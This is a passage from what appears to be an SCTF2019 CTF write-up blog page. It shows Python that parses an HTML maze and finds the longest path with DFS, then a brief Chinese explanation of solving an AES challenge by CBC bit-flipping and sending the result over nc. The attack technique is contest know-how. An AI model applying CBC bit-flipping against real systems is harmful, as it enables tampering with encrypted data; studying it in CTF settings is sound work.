class="number">1</span></span><br><span class="line">   visited[i][j]=<span class="number">1</span></span><br><span class="line">  <span class="keyword">else</span>: </span><br><span class="line">   <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> depth&gt;mlength:</span><br><span class="line">  <span class="keyword">global</span> mnode</span><br><span class="line">  mlength = depth</span><br><span class="line">  mnode = (i,j)</span><br><span class="line"> <span class="keyword">if</span> maze[i][j][<span class="number">0</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i<span class="number">-1</span>][j]:</span><br><span class="line">  dfs(i<span class="number">-1</span>,j,depth+<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">if</span> maze[i][j][<span class="number">1</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i][j+<span class="number">1</span>]:</span><br><span class="line">  dfs(i,j+<span class="number">1</span>,depth+<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">if</span> maze[i][j][<span class="number">2</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i+<span class="number">1</span>][j]:</span><br><span class="line">  dfs(i+<span class="number">1</span>,j,depth+<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">if</span> maze[i][j][<span class="number">3</span>] <span class="keyword">and</span> <span class="keyword">not</span> visited[i][j<span class="number">-1</span>]:</span><br><span class="line">  dfs(i,j<span class="number">-1</span>,depth+<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> sourse = open(<span class="string">'./Maze.html'</span>).read()</span><br><span class="line"> soup = BeautifulSoup(sourse,<span class="string">"html.parser"</span>)</span><br><span class="line"> result = soup.select(<span class="string">'td'</span>)</span><br><span class="line"> <span class="comment"># print result</span></span><br><span class="line"> style = [i.get(<span class="string">"style"</span>) <span class="keyword">for</span> i <span class="keyword">in</span> result]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(length):</span><br><span class="line">  <span class="keyword">for</span> j <span class="keyword">in</span> range(width):</span><br><span class="line">   k = i*width+j</span><br><span class="line">   <span class="keyword">if</span> k&gt;len(style):</span><br><span class="line">    <span class="keyword">break</span></span><br><span class="line">   walls = style[k]</span><br><span class="line">   <span class="keyword">if</span> <span class="string">u'border-top'</span> <span class="keyword">in</span> walls:</span><br><span class="line">    maze[i][j][<span class="number">0</span>] = <span class="number">0</span></span><br><span class="line">   <span class="keyword">if</span> <span class="string">u'border-right'</span> <span class="keyword">in</span> walls:</span><br><span class="line">    maze[i][j][<span class="number">1</span>] = <span class="number">0</span></span><br><span class="line">   <span class="keyword">if</span> <span class="string">u'border-bottom'</span> <span class="keyword">in</span> walls:</span><br><span class="line">    maze[i][j][<span class="number">2</span>] = <span class="number">0</span></span><br><span class="line">   <span class="keyword">if</span> <span class="string">u'border-left'</span> <span class="keyword">in</span> walls:</span><br><span class="line">    maze[i][j][<span class="number">3</span>] = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># print maze</span></span><br><span class="line"> dfs(<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">print</span> mlength</span><br><span class="line"> <span class="keyword">print</span> mnode</span><br><span class="line"> <span class="comment"># print visited</span></span><br><span class="line"> visited = [[<span class="number">0</span> <span class="keyword">for</span> j <span class="keyword">in</span> range(width)]<span class="keyword">for</span> i <span class="keyword">in</span> range(length)]</span><br><span class="line"> dfs(mnode[<span class="number">0</span>],mnode[<span class="number">1</span>],<span class="number">1</span>)</span><br><span class="line"> <span class="keyword">print</span> mlength</span><br><span class="line"> <span class="keyword">print</span> mnode</span><br></pre></td></tr></table></figure>

<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h2><h3 id="Warmup"><a href="#Warmup" class="headerlink" title="Warmup"></a>Warmup</h3><p>打开发现AES加密有两个条件语句 一个是msg的判断一个code的判断。发现需要对msg做CBC字节翻转，翻转后得到</p>
<p>706c656173652073656e64206d6520796f757220666c616700000000000000003b1c5a0d0f0658502b6124xxxxxxxxxxx</p>
<p>然后nc输入code即可</p>
<p><img src="https://img.5am3.com/20190624156134945857803.png" alt="20190624156134945857803.png"></p>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">
      

    
      

    <span class="post-categories">
      <i class="icon-categories"></i>
        <a href="/categories/CTF/">CTF</a>
    </span>
    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/tags/CTF/">CTF</a><a href="/tags/WriteUp/">WriteUp</a><a href="/tags/SCTF2019/">SCTF2019</a>
    </span>
    
    

    

    </div>

    
  </div>
</article>

  
	<section id="comment" class="comment">
		<div id="vcomments"></div>
	</section>
	<!-- LeanCloud -->
	<script src="//cdn.jsdelivr.net/npm/leancloud-storage@3.10.0/dist/av-min.js"></script>
	<!-- Valine -->
	<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
	<script>
		new Valine({
			el: '#vcomments',
			appId: '86EMltAutxkr1IaqhOo0dP7l-gzGzoHsz',
			appKey: 'kdJzexN5shKVeTpQx49IQDaH'
		})
	</script>






    </main>

    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/CodeDaraW/Hacker" target="_blank">Hacker</a>
    <br>
    
    &copy; 2019 kn0ck Team
    
  </p>
</footer>
    
  </div>
</div>
</body>
</html>